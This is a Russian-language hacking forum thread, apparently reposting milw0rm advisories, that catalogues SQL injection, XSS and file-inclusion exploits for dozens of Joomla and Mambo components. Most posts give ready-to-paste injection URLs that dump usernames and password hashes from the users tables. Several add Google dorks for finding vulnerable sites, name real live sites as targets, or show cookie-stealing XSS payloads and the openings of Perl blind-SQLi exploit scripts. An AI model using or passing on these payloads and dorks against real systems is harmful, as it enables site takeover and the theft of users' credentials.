![]() |
Joomla Component rapidrecipe <= 1.6.5 SQL Injection
SQL Injection Код:
after user_id or catogry_id add exploitКод:
allinurl: "com_rapidrecipe"user_idJoomla Component pcchess <= 0.8 Remote SQL Injection SQL Injection Код:
index.php?option=com_pcchess&Itemid=S@BUN&page=players&user_id=-9999999/**/union/**/select/**/concat(username,0x3a,password)/**/from/**/jos_users/*Код:
allinurl: com_pcchess "user_id" |
Нашел сам, проверил - вроде не боян
Limbo - Lite Mambo 1.0.4 SQL инъекция в модуле downloads, в параметре catid, сайты тех поддержки уязвимы: Код:
http://limbo-cms.com.ru/index.php?option=downloads&catid=2700+union+select+1,concat_ws(0x3a,username,password),3+from+lc_users+--+Код:
http://limboportal.com/index.php?option=downloads&catid=7%20and%20substring(version(),1,1)=3+--+ |
Component Blog Calendar 1.2.4 Passiv XSS
inurl: index.php?option=com_blog_calendar Инъекция: Код:
index.php?option=com_blog_calendar&year=%22onmouseover=%22avascript:alert(document.coockie);%22%3E123%3C!--Component Board [версия неизвестна] Local Include inurl: index.php?option=com_board Инъекция: Код:
index.php?option=com_board&bbs_id=notice&Itemid=99999999&requiredfile=(c) it's my |
Joomla Component xfaq 1.2 (aid) Remote SQL Injection Vulnerability Код:
index.php?option=com_xfaq&task=answer&Itemid=S@BUN&catid=97&aid=-9988%2F%2A%2A%2Funion%2F%2A%2A%2Fselect/**/concat(username,0x3a,password),0x3a,password,0x3a,username,0,0,0,0,1,1,1,1,1,1,1,1,0,0,0/**/from/**/jos_users/* |
Joomla Component paxxgallery 0.2 (iid) SQL Injection
Exploit Код:
AFTER userid ADD EXPLİOT(USERİD DEN SONRA EXPLOİT EKLE)Код:
allinurl: com_paxxgallery "iid"Joomla Component MCQuiz 0.9 Final (tid) SQL Injection Exploit Код:
ATTACKER CAN SEE PASSWORD AND USERNAME UNDER PAGEКод:
allinurl: com_mcquiz "tid"Joomla Component Quiz <= 0.81 (tid) SQL Injection Exploit Код:
ALL PASSWORD AND USERNAME UNDER PAGEКод:
allinurl: com_quiz"tid"Joomla Component mediaslide (albumnum) Blind SQL Injection Код:
#!/usr/bin/perl |
Mambo Component Quran <= 1.1 (surano) SQL Injection Vulnerability
Mambo Код:
/index.php?option=com_quran&action=viewayat&surano=-1+union+all+select+1,concat(username,0x3a,password ),3,4,5+from+mos_users+limit+0,20--Код:
/index.php?option=com_quran&action=viewayat&surano=-1+union+all+select+1,concat(username,0x3a,password ),3,4,5+from+jos_users+limit+0,20--inurl:"/index.php?option=com_quran" (c)milw0rm.com |
Mambo Component Ricette 1.0 Remote SQL Injection Vulnerability
EXPLOIT Цитата:
Цитата:
Цитата:
|
joomla SQL Injection(com_jooget)
EXPLOIT : Цитата:
Цитата:
Цитата:
Цитата:
Auth S@BUN http://milw0rm.com/exploits/5132 |
Component Portfolio 1.0 SQL Injection
inurl: index.php?option=com_portfolio Инъекция: Код:
index.php?option=com_portfolio&memberId=9&categoryId=-1+union+select+1,2,3,concat(username,0x3a,password),5,6,7,8,9,10,11,12+from+mos_users/*Joomla Component Artist Код:
http://www.tremplin-avenir.com/index.php?option=com_artist&task=view_artist_file&artistId=-1+union+select+1,2,3,4,5,6,7,8,9,concat(username,0x3a,password),11,12,13,14,15,16+from+jos_users/* |
Joomla Component com_pccookbook (user_id) SQL Injection
SQL Injection Код:
index.php?option=com_pccookbook&page=viewuserrecipes&user_id=-9999999/**/union/**/select/**/concat(username,0x3a,password)/**/from/**/jos_users/*Код:
allinurl: com_pccookbookJoomla Component com_clasifier (cat_id) SQL Injection SQL Injection Код:
index.php?option=com_clasifier&Itemid=S@BUN&cat_id=-9999999/**/union/**/select/**/concat(username,0x3a,password)/**/from/**/jos_users/*Код:
allinurl: com_clasifier |
Кoмпoнeнт соm_рhilаfоrm
уязвимый параметр fоrm_id но работает не везде,в чем причина не разобрался пример уязвимого сайта: код: httр://www.nехtрrоm.ru/index.рhр?орtiоn=соm_рhilаfоrm&Itеmid=5 &fоrm_id=1+uniоn+sеlесt+1,2,version(),4,5,6,7,8,9,10,11, 12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28 ,29,30,31,32,33,34,35,36#&Itemid=5 |
Component EasyBook 1.1 Active XSS
inurl: index.php?option=com_easybook Инъекция: Код:
При добавлении сообщения уязвимо поле "Ваш сайт:/Your Homepage:". вписываем: http://www.com/" onmouseover=javascript:alert(/XSS/);> и добавляем сообщение. |
Component Simpleboard 1.0.3 (catid) SQL Injection
inurl: index.php?option=com_simpleboard Инъекция: Код:
index.php?option=com_simpleboard&func=view&catid=-999+union+select+2,2,3,concat(0x3a,0x3a,username,0x3a,password),5+from+mos_users/* |
Mambo Component com_Musica (id) Remote SQL Injection Vulnerability
SQL Injection Код:
index.php?option=com_musica&Itemid=172&tasko=viewo &task=view2&id=-4214/**/union+select/**/0,0,password,0,0,0,0,0,0,0,0,0,1,1,1,0,0,0,0,0+fro m%2F%2A%2A%2Fmos_users/*milw0rm |
Mambo Component eWriting 1.2.1 (cat) SQL Injection Vulnerability
SQL Injection Joomla! Код:
/index.php?option=com_ewriting&Itemid=9999&func=selectcat&cat=-1+UNION+ALL+SELECT+1,2,concat(username,0x3a,password),4,5,6,7,8,9,10+FROM+jos_users--Код:
/index.php?option=com_ewriting&Itemid=9999&func=selectcat&cat=-1+UNION+ALL+SELECT+1,2,concat(username,0x3a,password),4,5,6,7,8,9,10+FROM+mos_users--milw0rm |
Joomla Component ProductShowcase <= 1.5 SQL Injection Vulnerability
SQL Injection Код:
index.php?option=com_productshowcase&Itemid=S@BUN&action=details&id=-99999/**/union/**/select/**/0,concat(username,0x3a,password),concat(username,0x3a,password),0,0,0,0,0,1,1,1,1,2,3,4,5/**/from/**/jos_users/* |
Joomla 1.5.1
Active XSS Edit Your Details -> Your Name: [XSS] XSS (Права администратора) Active: Article: [ New ] -> Title: [XSS] Passive: Filter:[XSS] Код:
/administrator/index.php?option=com_menus&task=view&menutype=[XSS] |
Joomla components com_guide "category" Remote SQL Injection
PoC: Код:
index.php?option=com_guide&category=-999999/**/union/**/select/**/0,username, |
Joomla Component Datsogallery 1.3.1 Remote SQL Injection Vulnerability
SQL Injection index.php?option=com_datsogallery&func=detail&id=' Sql Код:
union+select+1,2,3,4,concat_ws(0x3a,id,username,password),6,7,8,9,0,1,2,3,4,5+from+jos_users/* |
Joomla Component MyAlbum 1.0 (album) SQL Injection Vulnerability
SQL Injection http://[target]/index.php?option=com_myalbum&album=[SQL] Код:
-1+union+select+0,concat(username,char(32),password),2,3,4%20from%20jos_users/*Joomla Component alphacontent <= 2.5.8 (id) SQL Injection Vulnerability SQL Injection Код:
index.php?option=com_alphacontent§ion=6&cat=15&task=view&id=-999999/**/union/**/select/**/1,concat(username,0x3e,password),3,4,user(),user(),user(),user(),user(),user(),user(),user(),user(),user(),user(),user(),user(),user(),user(),user(),user(),user(),user(),user(),user(),user(),user(),user(),user(),user(),user(),user(),user(),user(),user(),user(),user(),user(),39/**/from/**/jos_users/*inurl: "com_alphacontent" "AlphaContent 2.5.8 © 2005-2008 - visualclinic.fr" milw0rm |
Online FlashQuiz 1.0.2 Remote File Inclusion Vulnerability
Сайт разработчика : www.elearningforce.biz Сплоит : http://localhost/path/component/com_onlineflashquiz/quiz/common/db_config.inc.php?base_dir=[код] (с) NoGe |
Joomla Пасивная XSS компонент Traxartist
Уязвимость: index.php?option=com_traxartist&task=playSongex&id =1">[xss] Пример: Код:
http://www.xclusivetrax.com/index.php?option=com_traxartist&task=playSongex&id=1"><script>alert(document.coockie)</script> |
Joomla Component FlippingBook 1.0.4 SQL Injection
DORK: inurl:com_flippingbook Exploit: Код:
/index.php?option=com_flippingbook&Itemid=28&book_id=null/**/union/**/select/**/null,concat(username,0x3e,password),null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null/**/from/**/jos_users/*milw0rm.com Joomla Component Filiale v. 1.0.4 SQL Injection DORK: inurl:com_filiale Exploit: Код:
/index.php?option=com_filiale&idFiliale=-5+union+select+1,password,3,4,username,6,7,8,9,10,11+from+jos_usersmilw0rm.com Joomla Component Profiler <= 1.0.1 Blind SQL Injection DORK: allinurl:com_comprofiler Exploit: Код:
/index.php?option=com_comprofiler&task=userProfile&user=1/**/and/**/mid((select/**/password/**/from/**/jos_users/**/limit/**/0,1),1,1)/**/</**/Char(97)/*milw0rm.com |
Joomla Component PaxxGallery Blind SQL Injection Exploit "more than 1 row" Vuln code: PHP код:
Код:
#!/usr/bin/perlZAMUT (c) |
Joomla Component Webhosting (catid) Blind SQL Injection Exploit
Exploit: Код:
#!/usr/bin/perl |
Joomla Component com_datsogallery 1.6 Blind SQL Injection Exploit
Код:
<?Author : +toxa+ |
Joomla Component xsstream-dm 0.01 Beta SQL Injection Код:
#!/usr/bin/perl -w |
Joomla Component com_galeria Remote SQL Injection Vulnerability
Код:
############################################################### |
Раскрытие префикса таблиц в компоненте datsogallery
есои при обращении к старнице Цитата:
Цитата:
пример _http://www.sociotypes.ru/components/com_datsogallery/sub_votepic.php?id=1&user_rating=1 |
Цитата:
|
Mambo Component garyscookbook <= 1.1.1 SQL Injection Vulnerability
Код:
############################################################### |
нашел у себя на компе, хз может баян
Код:
inurl:"com_flyspray"Код:
Google Dork: |
Joomla Component com_mycontent 1.1.13 Blind SQL Injection Exploit
Код:
#!/usr/bin/perlJoomla Component JooBB 0.5.9 Blind SQL Injection Exploit Код:
#!/usr/bin/perl |
Joomla Component acctexp <= 0.12.x Blind SQL Injection Ex
Код:
#!/usr/bin/perl |
Joomla Component jotloader <= 1.2.1.a Blind SQL injection
Код:
#!/usr/bin/perl |
Joomla Component EasyBook 1.1 SQL Injection Exploit
Joomla Component EasyBook 1.1 SQL Injection Exploit
Код:
#!/usr/bin/perl |
Joomla Component simpleshop <= 3.4 SQL injection
Цитата:
|
joomla Sql Injection Scanner V 1.0
http://beenuarora.com/code/joomsq.py
|
Joomla Component GameQ <= 4.0 Remote SQL injection Vulnerability
Код:
/---------------------------------------------------------------\ |
Joomla Component yvcomment <= 1.16 Blind SQL Injection Exploit Код:
#!/usr/bin/perl |
| Время: 15:31 |